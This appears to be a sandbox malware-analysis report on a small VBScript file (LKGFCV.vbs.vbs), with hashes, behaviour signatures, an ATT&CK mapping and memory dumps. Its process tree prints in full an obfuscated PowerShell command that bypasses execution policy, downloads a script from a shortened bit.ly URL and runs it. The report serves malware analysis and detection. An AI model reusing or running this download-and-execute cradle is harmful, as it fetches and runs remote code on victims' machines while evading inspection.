Overview

overview

10

Static

static

LKGFCV.vbs.vbs

windows7_x64

8

LKGFCV.vbs.vbs

windows10_x64

10

Analysis

  • max time kernel
    62s
  • max time network
    90s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    27-07-2021 16:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LKGFCV.vbs.vbs

  • Size

    730B

  • MD5

    8a7246cc77596aa840c15b3ac9907c4e

  • SHA1

    c34f30b5aa3777cf3b3d35cfd8af330f8af97981

  • SHA256

    c7be7d6e94c31e0f376d1cb9be3e0f311d57ae1a318437dc7c28b2574a73be31

  • SHA512

    790e62a08b098dcdda4dfc1cc218712f069426b639420aca7ae6dfbd239f765fe379b92847d12da8a8f68699068d1779e7415d1c76fa64a989ae9dfa8b7dbe94

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LKGFCV.vbs.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1036
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3BMLFhm'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1996

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1036-60-0x000007FEFB701000-0x000007FEFB703000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1996-61-0x0000000000000000-mapping.dmp
    Download
  • memory/1996-63-0x0000000002500000-0x0000000002501000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1996-64-0x000000001AD20000-0x000000001AD21000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1996-65-0x0000000001DD0000-0x0000000001DD1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1996-66-0x000000001ACA0000-0x000000001ACA2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1996-67-0x000000001ACA4000-0x000000001ACA6000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1996-68-0x0000000001E80000-0x0000000001E81000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1996-69-0x000000001A960000-0x000000001A961000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1996-70-0x000000001A9F0000-0x000000001A9F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1996-71-0x0000000001D40000-0x0000000001D41000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1996-72-0x000000001ABC0000-0x000000001ABC1000-memory.dmp
    Filesize

    4KB

    Download